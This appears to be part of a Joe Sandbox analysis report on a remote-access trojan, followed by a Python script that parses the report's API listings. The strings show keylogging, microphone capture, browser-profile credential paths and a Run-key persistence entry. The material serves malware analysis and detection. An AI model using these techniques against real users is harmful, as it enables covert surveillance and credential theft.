                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: alarm.wav$hYG
                                                        • API String ID: 1174141254-2782910960
                                                        • Opcode ID: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                                                        • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                        • Opcode Fuzzy Hash: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                                                        • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                        • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                        • String ID: Online Keylogger Stopped
                                                        • API String ID: 1623830855-1496645233
                                                        • Opcode ID: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                                                        • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                        • Opcode Fuzzy Hash: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                                                        • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                                        • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wave$BufferHeaderPrepare
                                                        • String ID: XMG
                                                        • API String ID: 2315374483-813777761
                                                        • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                        • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocaleValid
                                                        • String ID: IsValidLocaleName$JD
                                                        • API String ID: 1901932003-2234456777
                                                        • Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                        • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                        • Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                        • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                        • API String ID: 1174141254-4188645398
                                                        • Opcode ID: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                                                        • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                        • Opcode Fuzzy Hash: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                                                        • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                        • API String ID: 1174141254-2800177040
                                                        • Opcode ID: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                                                        • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                        • Opcode Fuzzy Hash: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                                                        • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: AppData$\Opera Software\Opera Stable\
                                                        • API String ID: 1174141254-1629609700
                                                        • Opcode ID: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                                                        • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                        • Opcode Fuzzy Hash: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                                                        • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetKeyState.USER32(00000011), ref: 0040B64B
                                                          • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                          • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                          • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                                                          • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                          • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                        • String ID: [AltL]$[AltR]
                                                        • API String ID: 2738857842-2658077756
                                                        • Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                                        • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                        • Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                                        • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                        • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: uD
                                                        • API String ID: 0-2547262877
                                                        • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                        • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                        • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                        • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID: !D@$open
                                                        • API String ID: 587946157-1586967515
                                                        • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                                        • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                        • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                                        • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: State
                                                        • String ID: [CtrlL]$[CtrlR]
                                                        • API String ID: 1649606143-2446555240
                                                        • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                        • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                        • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                        • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Init_thread_footer__onexit
                                                        • String ID: ,kG$0kG
                                                        • API String ID: 1881088180-2015055088
                                                        • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                        • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                        • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                        • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteOpenValue
                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                        • API String ID: 2654517830-1051519024
                                                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                        • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                        • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteDirectoryFileRemove
                                                        • String ID: pth_unenc
                                                        • API String ID: 3325800564-4028850238
                                                        • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                        • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                        • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                        • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ObjectProcessSingleTerminateWait
                                                        • String ID: pth_unenc
                                                        • API String ID: 1872346434-4028850238
                                                        • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                        • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                        • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                        • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                        • GetLastError.KERNEL32 ref: 00440D35
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                        • String ID:
                                                        • API String ID: 1717984340-0
                                                        • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                        • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                        • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                        • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                        • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                        • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastRead
                                                        • String ID:
                                                        • API String ID: 4100373531-0
                                                        • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                        • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                        • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                        • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
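The four function entries above print every call argument as a raw 8-digit hex value, which hides what a reader actually wants to know: that the two SetLastError calls set 0x7F and 0x7E, which winerror.h defines as ERROR_PROC_NOT_FOUND (127) and ERROR_MOD_NOT_FOUND (126), that the IsBadReadPtr size argument 0x14 is 20 bytes, the size of an IMAGE_IMPORT_DESCRIPTOR, and that the MultiByteToWideChar dwFlags values 9 and 1 are MB_PRECOMPOSED|MB_ERR_INVALID_CHARS followed by MB_PRECOMPOSED alone (the retry shape the Microsoft CRT uses when the first call fails with ERROR_INVALID_FLAGS). The following parser is an added example by this editor, not part of the Joe Sandbox report or its IDA plugin; it takes the "APIs" bullets exactly as they appear in the entries above (embedded inline as constructed input), turns them into structured calls, annotates those constants, and derives the call sequence for the function. The "looks like a manual import resolver" check at the end is a heuristic reading of the ERROR_MOD_NOT_FOUND/ERROR_PROC_NOT_FOUND pair, not something the report states.

```python
"""Parse Joe Sandbox 'APIs' bullets from the IDA-plugin section of a report.

Added example, not Joe Sandbox code. REPORT_GROUPS below is copied from the
four function entries above; everything else is this editor's own.
"""
import re
from dataclasses import dataclass

# Constructed input: the 'APIs' bullets of the four entries above, one list per function.
REPORT_GROUPS = [
    ["• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1"],
    ["• TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860",
     "• WaitForSingleObject.KERNEL32(000000FF), ref: 00412873"],
    ["• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,"
     "00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27",
     "• GetLastError.KERNEL32 ref: 00440D35",
     "• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90"],
    ["• IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C",
     "• IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58",
     "• SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A",
     "• SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91"],
]

API_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)"  # e.g. IsBadReadPtr.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?,?\s*"               # argument list is absent for GetLastError
    r"ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"          # call site inside the memory dump
)

# Values from winerror.h and winnls.h; the report prints them only as raw hex.
WIN32_ERRORS = {0x7E: "ERROR_MOD_NOT_FOUND", 0x7F: "ERROR_PROC_NOT_FOUND", 0x3EC: "ERROR_INVALID_FLAGS"}
MB_FLAGS = {0x1: "MB_PRECOMPOSED", 0x2: "MB_COMPOSITE", 0x4: "MB_USEGLYPHCHARS", 0x8: "MB_ERR_INVALID_CHARS"}
SIZEOF_IMAGE_IMPORT_DESCRIPTOR = 0x14  # 20 bytes on both 32- and 64-bit PE


@dataclass
class ApiCall:
    api: str
    module: str
    args: list  # None for '?', int for an 8-hex-digit immediate, str for a string literal
    ref: int


def parse_arg(tok: str):
    """'?' is an argument the plugin could not recover; 8 hex digits may be an immediate or a pointer."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_line(line: str) -> ApiCall:
    m = API_RE.match(line)
    if not m:
        raise ValueError(f"not an APIs bullet: {line!r}")
    args = m.group("args")
    return ApiCall(api=m.group("api"), module=m.group("module"),
                   args=[parse_arg(t) for t in args.split(",")] if args else [],
                   ref=int(m.group("ref"), 16))


def parse_group(lines) -> list:
    return [parse_api_line(l) for l in lines]


def call_sequence(calls) -> str:
    """Ordered API names, e.g. 'IsBadReadPtr>IsBadReadPtr>SetLastError>SetLastError'."""
    return ">".join(c.api for c in calls)


def annotate(call: ApiCall) -> str:
    """Decode the constants the report leaves as raw hex; empty string if nothing to say."""
    if call.api == "SetLastError" and call.args and isinstance(call.args[0], int):
        return WIN32_ERRORS.get(call.args[0], f"unknown error 0x{call.args[0]:X}")
    if call.api == "MultiByteToWideChar" and len(call.args) > 1 and isinstance(call.args[1], int):
        flags = [name for bit, name in MB_FLAGS.items() if call.args[1] & bit]
        return "dwFlags=" + ("|".join(flags) or "0")
    if call.api == "IsBadReadPtr" and len(call.args) > 1 and call.args[1] == SIZEOF_IMAGE_IMPORT_DESCRIPTOR:
        return "ucb=0x14 (sizeof IMAGE_IMPORT_DESCRIPTOR)"
    return ""


def looks_like_import_resolver(calls) -> bool:
    """Heuristic (editor's inference): a routine that reports both ERROR_MOD_NOT_FOUND and
    ERROR_PROC_NOT_FOUND itself is behaving like LoadLibrary/GetProcAddress, i.e. resolving
    imports by hand rather than through the normal loader."""
    codes = {c.args[0] for c in calls if c.api == "SetLastError" and c.args and isinstance(c.args[0], int)}
    return {0x7E, 0x7F} <= codes


if __name__ == "__main__":
    for group in REPORT_GROUPS:
        calls = parse_group(group)
        print(call_sequence(calls), "| import resolver?", looks_like_import_resolver(calls))
        for c in calls:
            note = annotate(c)
            if note:
                print(f"  {c.api} @ {c.ref:08X}: {note}")
```

Run stand-alone it prints one line per function with the decoded constants under it; the same functions can be pointed at the "APIs" bullets of any other entry in this report, since the bullet format is identical throughout the IDA-plugin section.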